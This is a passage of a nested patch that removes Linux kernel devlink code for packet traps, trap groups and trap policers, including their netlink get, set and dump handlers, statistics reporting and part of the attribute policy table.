+-	u64 burst;
+-	struct list_head list;
+-};
+-
+-/**
+- * struct devlink_trap_group_item - Packet trap group attributes.
+- * @group: Immutable packet trap group attributes.
+- * @policer_item: Associated policer item. Can be NULL.
+- * @list: trap_group_list member.
+- * @stats: Trap group statistics.
+- *
+- * Describes packet trap group attributes. Created by devlink during trap
+- * group registration.
+- */
+-struct devlink_trap_group_item {
+-	const struct devlink_trap_group *group;
+-	struct devlink_trap_policer_item *policer_item;
+-	struct list_head list;
+-	struct devlink_stats __percpu *stats;
+-};
+-
+-/**
+- * struct devlink_trap_item - Packet trap attributes.
+- * @trap: Immutable packet trap attributes.
+- * @group_item: Associated group item.
+- * @list: trap_list member.
+- * @action: Trap action.
+- * @stats: Trap statistics.
+- * @priv: Driver private information.
+- *
+- * Describes both mutable and immutable packet trap attributes. Created by
+- * devlink during trap registration and used for all trap related operations.
+- */
+-struct devlink_trap_item {
+-	const struct devlink_trap *trap;
+-	struct devlink_trap_group_item *group_item;
+-	struct list_head list;
+-	enum devlink_trap_action action;
+-	struct devlink_stats __percpu *stats;
+-	void *priv;
+-};
+-
+-static struct devlink_trap_policer_item *
+-devlink_trap_policer_item_lookup(struct devlink *devlink, u32 id)
+-{
+-	struct devlink_trap_policer_item *policer_item;
+-
+-	list_for_each_entry(policer_item, &devlink->trap_policer_list, list) {
+-		if (policer_item->policer->id == id)
+-			return policer_item;
+-	}
+-
+-	return NULL;
+-}
+-
+-static struct devlink_trap_item *
+-devlink_trap_item_lookup(struct devlink *devlink, const char *name)
+-{
+-	struct devlink_trap_item *trap_item;
+-
+-	list_for_each_entry(trap_item, &devlink->trap_list, list) {
+-		if (!strcmp(trap_item->trap->name, name))
+-			return trap_item;
+-	}
+-
+-	return NULL;
+-}
+-
+-static struct devlink_trap_item *
+-devlink_trap_item_get_from_info(struct devlink *devlink,
+-				struct genl_info *info)
+-{
+-	struct nlattr *attr;
+-
+-	if (!info->attrs[DEVLINK_ATTR_TRAP_NAME])
+-		return NULL;
+-	attr = info->attrs[DEVLINK_ATTR_TRAP_NAME];
+-
+-	return devlink_trap_item_lookup(devlink, nla_data(attr));
+-}
+-
+-static int
+-devlink_trap_action_get_from_info(struct genl_info *info,
+-				  enum devlink_trap_action *p_trap_action)
+-{
+-	u8 val;
+-
+-	val = nla_get_u8(info->attrs[DEVLINK_ATTR_TRAP_ACTION]);
+-	switch (val) {
+-	case DEVLINK_TRAP_ACTION_DROP:
+-	case DEVLINK_TRAP_ACTION_TRAP:
+-	case DEVLINK_TRAP_ACTION_MIRROR:
+-		*p_trap_action = val;
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-static int devlink_trap_metadata_put(struct sk_buff *msg,
+-				     const struct devlink_trap *trap)
+-{
+-	struct nlattr *attr;
+-
+-	attr = nla_nest_start(msg, DEVLINK_ATTR_TRAP_METADATA);
+-	if (!attr)
+-		return -EMSGSIZE;
+-
+-	if ((trap->metadata_cap & DEVLINK_TRAP_METADATA_TYPE_F_IN_PORT) &&
+-	    nla_put_flag(msg, DEVLINK_ATTR_TRAP_METADATA_TYPE_IN_PORT))
+-		goto nla_put_failure;
+-	if ((trap->metadata_cap & DEVLINK_TRAP_METADATA_TYPE_F_FA_COOKIE) &&
+-	    nla_put_flag(msg, DEVLINK_ATTR_TRAP_METADATA_TYPE_FA_COOKIE))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(msg, attr);
+-
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, attr);
+-	return -EMSGSIZE;
+-}
+-
+-static void devlink_trap_stats_read(struct devlink_stats __percpu *trap_stats,
+-				    struct devlink_stats *stats)
+-{
+-	int i;
+-
+-	memset(stats, 0, sizeof(*stats));
+-	for_each_possible_cpu(i) {
+-		struct devlink_stats *cpu_stats;
+-		u64 rx_packets, rx_bytes;
+-		unsigned int start;
+-
+-		cpu_stats = per_cpu_ptr(trap_stats, i);
+-		do {
+-			start = u64_stats_fetch_begin_irq(&cpu_stats->syncp);
+-			rx_packets = u64_stats_read(&cpu_stats->rx_packets);
+-			rx_bytes = u64_stats_read(&cpu_stats->rx_bytes);
+-		} while (u64_stats_fetch_retry_irq(&cpu_stats->syncp, start));
+-
+-		u64_stats_add(&stats->rx_packets, rx_packets);
+-		u64_stats_add(&stats->rx_bytes, rx_bytes);
+-	}
+-}
+-
+-static int
+-devlink_trap_group_stats_put(struct sk_buff *msg,
+-			     struct devlink_stats __percpu *trap_stats)
+-{
+-	struct devlink_stats stats;
+-	struct nlattr *attr;
+-
+-	devlink_trap_stats_read(trap_stats, &stats);
+-
+-	attr = nla_nest_start(msg, DEVLINK_ATTR_STATS);
+-	if (!attr)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_PACKETS,
+-			      u64_stats_read(&stats.rx_packets),
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_BYTES,
+-			      u64_stats_read(&stats.rx_bytes),
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(msg, attr);
+-
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_trap_stats_put(struct sk_buff *msg, struct devlink *devlink,
+-				  const struct devlink_trap_item *trap_item)
+-{
+-	struct devlink_stats stats;
+-	struct nlattr *attr;
+-	u64 drops = 0;
+-	int err;
+-
+-	if (devlink->ops->trap_drop_counter_get) {
+-		err = devlink->ops->trap_drop_counter_get(devlink,
+-							  trap_item->trap,
+-							  &drops);
+-		if (err)
+-			return err;
+-	}
+-
+-	devlink_trap_stats_read(trap_item->stats, &stats);
+-
+-	attr = nla_nest_start(msg, DEVLINK_ATTR_STATS);
+-	if (!attr)
+-		return -EMSGSIZE;
+-
+-	if (devlink->ops->trap_drop_counter_get &&
+-	    nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_DROPPED, drops,
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_PACKETS,
+-			      u64_stats_read(&stats.rx_packets),
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_BYTES,
+-			      u64_stats_read(&stats.rx_bytes),
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(msg, attr);
+-
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_trap_fill(struct sk_buff *msg, struct devlink *devlink,
+-				const struct devlink_trap_item *trap_item,
+-				enum devlink_command cmd, u32 portid, u32 seq,
+-				int flags)
+-{
+-	struct devlink_trap_group_item *group_item = trap_item->group_item;
+-	void *hdr;
+-	int err;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-
+-	if (nla_put_string(msg, DEVLINK_ATTR_TRAP_GROUP_NAME,
+-			   group_item->group->name))
+-		goto nla_put_failure;
+-
+-	if (nla_put_string(msg, DEVLINK_ATTR_TRAP_NAME, trap_item->trap->name))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u8(msg, DEVLINK_ATTR_TRAP_TYPE, trap_item->trap->type))
+-		goto nla_put_failure;
+-
+-	if (trap_item->trap->generic &&
+-	    nla_put_flag(msg, DEVLINK_ATTR_TRAP_GENERIC))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u8(msg, DEVLINK_ATTR_TRAP_ACTION, trap_item->action))
+-		goto nla_put_failure;
+-
+-	err = devlink_trap_metadata_put(msg, trap_item->trap);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	err = devlink_trap_stats_put(msg, devlink, trap_item);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_cmd_trap_get_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_trap_item *trap_item;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	if (list_empty(&devlink->trap_list))
+-		return -EOPNOTSUPP;
+-
+-	trap_item = devlink_trap_item_get_from_info(devlink, info);
+-	if (!trap_item) {
+-		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap");
+-		return -ENOENT;
+-	}
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_trap_fill(msg, devlink, trap_item,
+-				   DEVLINK_CMD_TRAP_NEW, info->snd_portid,
+-				   info->snd_seq, 0);
+-	if (err)
+-		goto err_trap_fill;
+-
+-	return genlmsg_reply(msg, info);
+-
+-err_trap_fill:
+-	nlmsg_free(msg);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_trap_get_dumpit(struct sk_buff *msg,
+-					  struct netlink_callback *cb)
+-{
+-	struct devlink_trap_item *trap_item;
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		devl_lock(devlink);
+-		list_for_each_entry(trap_item, &devlink->trap_list, list) {
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			err = devlink_nl_trap_fill(msg, devlink, trap_item,
+-						   DEVLINK_CMD_TRAP_NEW,
+-						   NETLINK_CB(cb->skb).portid,
+-						   cb->nlh->nlmsg_seq,
+-						   NLM_F_MULTI);
+-			if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int __devlink_trap_action_set(struct devlink *devlink,
+-				     struct devlink_trap_item *trap_item,
+-				     enum devlink_trap_action trap_action,
+-				     struct netlink_ext_ack *extack)
+-{
+-	int err;
+-
+-	if (trap_item->action != trap_action &&
+-	    trap_item->trap->type != DEVLINK_TRAP_TYPE_DROP) {
+-		NL_SET_ERR_MSG_MOD(extack, "Cannot change action of non-drop traps. Skipping");
+-		return 0;
+-	}
+-
+-	err = devlink->ops->trap_action_set(devlink, trap_item->trap,
+-					    trap_action, extack);
+-	if (err)
+-		return err;
+-
+-	trap_item->action = trap_action;
+-
+-	return 0;
+-}
+-
+-static int devlink_trap_action_set(struct devlink *devlink,
+-				   struct devlink_trap_item *trap_item,
+-				   struct genl_info *info)
+-{
+-	enum devlink_trap_action trap_action;
+-	int err;
+-
+-	if (!info->attrs[DEVLINK_ATTR_TRAP_ACTION])
+-		return 0;
+-
+-	err = devlink_trap_action_get_from_info(info, &trap_action);
+-	if (err) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "Invalid trap action");
+-		return -EINVAL;
+-	}
+-
+-	return __devlink_trap_action_set(devlink, trap_item, trap_action,
+-					 info->extack);
+-}
+-
+-static int devlink_nl_cmd_trap_set_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_trap_item *trap_item;
+-
+-	if (list_empty(&devlink->trap_list))
+-		return -EOPNOTSUPP;
+-
+-	trap_item = devlink_trap_item_get_from_info(devlink, info);
+-	if (!trap_item) {
+-		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap");
+-		return -ENOENT;
+-	}
+-
+-	return devlink_trap_action_set(devlink, trap_item, info);
+-}
+-
+-static struct devlink_trap_group_item *
+-devlink_trap_group_item_lookup(struct devlink *devlink, const char *name)
+-{
+-	struct devlink_trap_group_item *group_item;
+-
+-	list_for_each_entry(group_item, &devlink->trap_group_list, list) {
+-		if (!strcmp(group_item->group->name, name))
+-			return group_item;
+-	}
+-
+-	return NULL;
+-}
+-
+-static struct devlink_trap_group_item *
+-devlink_trap_group_item_lookup_by_id(struct devlink *devlink, u16 id)
+-{
+-	struct devlink_trap_group_item *group_item;
+-
+-	list_for_each_entry(group_item, &devlink->trap_group_list, list) {
+-		if (group_item->group->id == id)
+-			return group_item;
+-	}
+-
+-	return NULL;
+-}
+-
+-static struct devlink_trap_group_item *
+-devlink_trap_group_item_get_from_info(struct devlink *devlink,
+-				      struct genl_info *info)
+-{
+-	char *name;
+-
+-	if (!info->attrs[DEVLINK_ATTR_TRAP_GROUP_NAME])
+-		return NULL;
+-	name = nla_data(info->attrs[DEVLINK_ATTR_TRAP_GROUP_NAME]);
+-
+-	return devlink_trap_group_item_lookup(devlink, name);
+-}
+-
+-static int
+-devlink_nl_trap_group_fill(struct sk_buff *msg, struct devlink *devlink,
+-			   const struct devlink_trap_group_item *group_item,
+-			   enum devlink_command cmd, u32 portid, u32 seq,
+-			   int flags)
+-{
+-	void *hdr;
+-	int err;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-
+-	if (nla_put_string(msg, DEVLINK_ATTR_TRAP_GROUP_NAME,
+-			   group_item->group->name))
+-		goto nla_put_failure;
+-
+-	if (group_item->group->generic &&
+-	    nla_put_flag(msg, DEVLINK_ATTR_TRAP_GENERIC))
+-		goto nla_put_failure;
+-
+-	if (group_item->policer_item &&
+-	    nla_put_u32(msg, DEVLINK_ATTR_TRAP_POLICER_ID,
+-			group_item->policer_item->policer->id))
+-		goto nla_put_failure;
+-
+-	err = devlink_trap_group_stats_put(msg, group_item->stats);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_cmd_trap_group_get_doit(struct sk_buff *skb,
+-					      struct genl_info *info)
+-{
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_trap_group_item *group_item;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	if (list_empty(&devlink->trap_group_list))
+-		return -EOPNOTSUPP;
+-
+-	group_item = devlink_trap_group_item_get_from_info(devlink, info);
+-	if (!group_item) {
+-		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap group");
+-		return -ENOENT;
+-	}
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_trap_group_fill(msg, devlink, group_item,
+-					 DEVLINK_CMD_TRAP_GROUP_NEW,
+-					 info->snd_portid, info->snd_seq, 0);
+-	if (err)
+-		goto err_trap_group_fill;
+-
+-	return genlmsg_reply(msg, info);
+-
+-err_trap_group_fill:
+-	nlmsg_free(msg);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_trap_group_get_dumpit(struct sk_buff *msg,
+-						struct netlink_callback *cb)
+-{
+-	enum devlink_command cmd = DEVLINK_CMD_TRAP_GROUP_NEW;
+-	struct devlink_trap_group_item *group_item;
+-	u32 portid = NETLINK_CB(cb->skb).portid;
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		devl_lock(devlink);
+-		list_for_each_entry(group_item, &devlink->trap_group_list,
+-				    list) {
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			err = devlink_nl_trap_group_fill(msg, devlink,
+-							 group_item, cmd,
+-							 portid,
+-							 cb->nlh->nlmsg_seq,
+-							 NLM_F_MULTI);
+-			if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int
+-__devlink_trap_group_action_set(struct devlink *devlink,
+-				struct devlink_trap_group_item *group_item,
+-				enum devlink_trap_action trap_action,
+-				struct netlink_ext_ack *extack)
+-{
+-	const char *group_name = group_item->group->name;
+-	struct devlink_trap_item *trap_item;
+-	int err;
+-
+-	if (devlink->ops->trap_group_action_set) {
+-		err = devlink->ops->trap_group_action_set(devlink, group_item->group,
+-							  trap_action, extack);
+-		if (err)
+-			return err;
+-
+-		list_for_each_entry(trap_item, &devlink->trap_list, list) {
+-			if (strcmp(trap_item->group_item->group->name, group_name))
+-				continue;
+-			if (trap_item->action != trap_action &&
+-			    trap_item->trap->type != DEVLINK_TRAP_TYPE_DROP)
+-				continue;
+-			trap_item->action = trap_action;
+-		}
+-
+-		return 0;
+-	}
+-
+-	list_for_each_entry(trap_item, &devlink->trap_list, list) {
+-		if (strcmp(trap_item->group_item->group->name, group_name))
+-			continue;
+-		err = __devlink_trap_action_set(devlink, trap_item,
+-						trap_action, extack);
+-		if (err)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+-static int
+-devlink_trap_group_action_set(struct devlink *devlink,
+-			      struct devlink_trap_group_item *group_item,
+-			      struct genl_info *info, bool *p_modified)
+-{
+-	enum devlink_trap_action trap_action;
+-	int err;
+-
+-	if (!info->attrs[DEVLINK_ATTR_TRAP_ACTION])
+-		return 0;
+-
+-	err = devlink_trap_action_get_from_info(info, &trap_action);
+-	if (err) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "Invalid trap action");
+-		return -EINVAL;
+-	}
+-
+-	err = __devlink_trap_group_action_set(devlink, group_item, trap_action,
+-					      info->extack);
+-	if (err)
+-		return err;
+-
+-	*p_modified = true;
+-
+-	return 0;
+-}
+-
+-static int devlink_trap_group_set(struct devlink *devlink,
+-				  struct devlink_trap_group_item *group_item,
+-				  struct genl_info *info)
+-{
+-	struct devlink_trap_policer_item *policer_item;
+-	struct netlink_ext_ack *extack = info->extack;
+-	const struct devlink_trap_policer *policer;
+-	struct nlattr **attrs = info->attrs;
+-	int err;
+-
+-	if (!attrs[DEVLINK_ATTR_TRAP_POLICER_ID])
+-		return 0;
+-
+-	if (!devlink->ops->trap_group_set)
+-		return -EOPNOTSUPP;
+-
+-	policer_item = group_item->policer_item;
+-	if (attrs[DEVLINK_ATTR_TRAP_POLICER_ID]) {
+-		u32 policer_id;
+-
+-		policer_id = nla_get_u32(attrs[DEVLINK_ATTR_TRAP_POLICER_ID]);
+-		policer_item = devlink_trap_policer_item_lookup(devlink,
+-								policer_id);
+-		if (policer_id && !policer_item) {
+-			NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap policer");
+-			return -ENOENT;
+-		}
+-	}
+-	policer = policer_item ? policer_item->policer : NULL;
+-
+-	err = devlink->ops->trap_group_set(devlink, group_item->group, policer,
+-					   extack);
+-	if (err)
+-		return err;
+-
+-	group_item->policer_item = policer_item;
+-
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_trap_group_set_doit(struct sk_buff *skb,
+-					      struct genl_info *info)
+-{
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_trap_group_item *group_item;
+-	bool modified = false;
+-	int err;
+-
+-	if (list_empty(&devlink->trap_group_list))
+-		return -EOPNOTSUPP;
+-
+-	group_item = devlink_trap_group_item_get_from_info(devlink, info);
+-	if (!group_item) {
+-		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap group");
+-		return -ENOENT;
+-	}
+-
+-	err = devlink_trap_group_action_set(devlink, group_item, info,
+-					    &modified);
+-	if (err)
+-		return err;
+-
+-	err = devlink_trap_group_set(devlink, group_item, info);
+-	if (err)
+-		goto err_trap_group_set;
+-
+-	return 0;
+-
+-err_trap_group_set:
+-	if (modified)
+-		NL_SET_ERR_MSG_MOD(extack, "Trap group set failed, but some changes were committed already");
+-	return err;
+-}
+-
+-static struct devlink_trap_policer_item *
+-devlink_trap_policer_item_get_from_info(struct devlink *devlink,
+-					struct genl_info *info)
+-{
+-	u32 id;
+-
+-	if (!info->attrs[DEVLINK_ATTR_TRAP_POLICER_ID])
+-		return NULL;
+-	id = nla_get_u32(info->attrs[DEVLINK_ATTR_TRAP_POLICER_ID]);
+-
+-	return devlink_trap_policer_item_lookup(devlink, id);
+-}
+-
+-static int
+-devlink_trap_policer_stats_put(struct sk_buff *msg, struct devlink *devlink,
+-			       const struct devlink_trap_policer *policer)
+-{
+-	struct nlattr *attr;
+-	u64 drops;
+-	int err;
+-
+-	if (!devlink->ops->trap_policer_counter_get)
+-		return 0;
+-
+-	err = devlink->ops->trap_policer_counter_get(devlink, policer, &drops);
+-	if (err)
+-		return err;
+-
+-	attr = nla_nest_start(msg, DEVLINK_ATTR_STATS);
+-	if (!attr)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_DROPPED, drops,
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(msg, attr);
+-
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int
+-devlink_nl_trap_policer_fill(struct sk_buff *msg, struct devlink *devlink,
+-			     const struct devlink_trap_policer_item *policer_item,
+-			     enum devlink_command cmd, u32 portid, u32 seq,
+-			     int flags)
+-{
+-	void *hdr;
+-	int err;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u32(msg, DEVLINK_ATTR_TRAP_POLICER_ID,
+-			policer_item->policer->id))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_TRAP_POLICER_RATE,
+-			      policer_item->rate, DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_TRAP_POLICER_BURST,
+-			      policer_item->burst, DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	err = devlink_trap_policer_stats_put(msg, devlink,
+-					     policer_item->policer);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_cmd_trap_policer_get_doit(struct sk_buff *skb,
+-						struct genl_info *info)
+-{
+-	struct devlink_trap_policer_item *policer_item;
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct sk_buff *msg;
+-	int err;
+-
+-	if (list_empty(&devlink->trap_policer_list))
+-		return -EOPNOTSUPP;
+-
+-	policer_item = devlink_trap_policer_item_get_from_info(devlink, info);
+-	if (!policer_item) {
+-		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap policer");
+-		return -ENOENT;
+-	}
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_trap_policer_fill(msg, devlink, policer_item,
+-					   DEVLINK_CMD_TRAP_POLICER_NEW,
+-					   info->snd_portid, info->snd_seq, 0);
+-	if (err)
+-		goto err_trap_policer_fill;
+-
+-	return genlmsg_reply(msg, info);
+-
+-err_trap_policer_fill:
+-	nlmsg_free(msg);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_trap_policer_get_dumpit(struct sk_buff *msg,
+-						  struct netlink_callback *cb)
+-{
+-	enum devlink_command cmd = DEVLINK_CMD_TRAP_POLICER_NEW;
+-	struct devlink_trap_policer_item *policer_item;
+-	u32 portid = NETLINK_CB(cb->skb).portid;
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		devl_lock(devlink);
+-		list_for_each_entry(policer_item, &devlink->trap_policer_list,
+-				    list) {
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			err = devlink_nl_trap_policer_fill(msg, devlink,
+-							   policer_item, cmd,
+-							   portid,
+-							   cb->nlh->nlmsg_seq,
+-							   NLM_F_MULTI);
+-			if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int
+-devlink_trap_policer_set(struct devlink *devlink,
+-			 struct devlink_trap_policer_item *policer_item,
+-			 struct genl_info *info)
+-{
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct nlattr **attrs = info->attrs;
+-	u64 rate, burst;
+-	int err;
+-
+-	rate = policer_item->rate;
+-	burst = policer_item->burst;
+-
+-	if (attrs[DEVLINK_ATTR_TRAP_POLICER_RATE])
+-		rate = nla_get_u64(attrs[DEVLINK_ATTR_TRAP_POLICER_RATE]);
+-
+-	if (attrs[DEVLINK_ATTR_TRAP_POLICER_BURST])
+-		burst = nla_get_u64(attrs[DEVLINK_ATTR_TRAP_POLICER_BURST]);
+-
+-	if (rate < policer_item->policer->min_rate) {
+-		NL_SET_ERR_MSG_MOD(extack, "Policer rate lower than limit");
+-		return -EINVAL;
+-	}
+-
+-	if (rate > policer_item->policer->max_rate) {
+-		NL_SET_ERR_MSG_MOD(extack, "Policer rate higher than limit");
+-		return -EINVAL;
+-	}
+-
+-	if (burst < policer_item->policer->min_burst) {
+-		NL_SET_ERR_MSG_MOD(extack, "Policer burst size lower than limit");
+-		return -EINVAL;
+-	}
+-
+-	if (burst > policer_item->policer->max_burst) {
+-		NL_SET_ERR_MSG_MOD(extack, "Policer burst size higher than limit");
+-		return -EINVAL;
+-	}
+-
+-	err = devlink->ops->trap_policer_set(devlink, policer_item->policer,
+-					     rate, burst, info->extack);
+-	if (err)
+-		return err;
+-
+-	policer_item->rate = rate;
+-	policer_item->burst = burst;
+-
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_trap_policer_set_doit(struct sk_buff *skb,
+-						struct genl_info *info)
+-{
+-	struct devlink_trap_policer_item *policer_item;
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct devlink *devlink = info->user_ptr[0];
+-
+-	if (list_empty(&devlink->trap_policer_list))
+-		return -EOPNOTSUPP;
+-
+-	if (!devlink->ops->trap_policer_set)
+-		return -EOPNOTSUPP;
+-
+-	policer_item = devlink_trap_policer_item_get_from_info(devlink, info);
+-	if (!policer_item) {
+-		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap policer");
+-		return -ENOENT;
+-	}
+-
+-	return devlink_trap_policer_set(devlink, policer_item, info);
+-}
+-
+-static const struct nla_policy devlink_nl_policy[DEVLINK_ATTR_MAX + 1] = {
+-	[DEVLINK_ATTR_UNSPEC] = { .strict_start_type =
+-		DEVLINK_ATTR_TRAP_POLICER_ID },
+-	[DEVLINK_ATTR_BUS_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_DEV_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_PORT_INDEX] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_PORT_TYPE] = NLA_POLICY_RANGE(NLA_U16, DEVLINK_PORT_TYPE_AUTO,
+-						    DEVLINK_PORT_TYPE_IB),
+-	[DEVLINK_ATTR_PORT_SPLIT_COUNT] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_SB_INDEX] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_SB_POOL_INDEX] = { .type = NLA_U16 },
+-	[DEVLINK_ATTR_SB_POOL_TYPE] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_SB_POOL_SIZE] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_SB_THRESHOLD] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_SB_TC_INDEX] = { .type = NLA_U16 },
+-	[DEVLINK_ATTR_ESWITCH_MODE] = NLA_POLICY_RANGE(NLA_U16, DEVLINK_ESWITCH_MODE_LEGACY,
+-						       DEVLINK_ESWITCH_MODE_SWITCHDEV),
+-	[DEVLINK_ATTR_ESWITCH_INLINE_MODE] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_ESWITCH_ENCAP_MODE] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_DPIPE_TABLE_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_RESOURCE_ID] = { .type = NLA_U64},
+-	[DEVLINK_ATTR_RESOURCE_SIZE] = { .type = NLA_U64},
+-	[DEVLINK_ATTR_PARAM_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_PARAM_TYPE] = { .type = NLA_U8 },
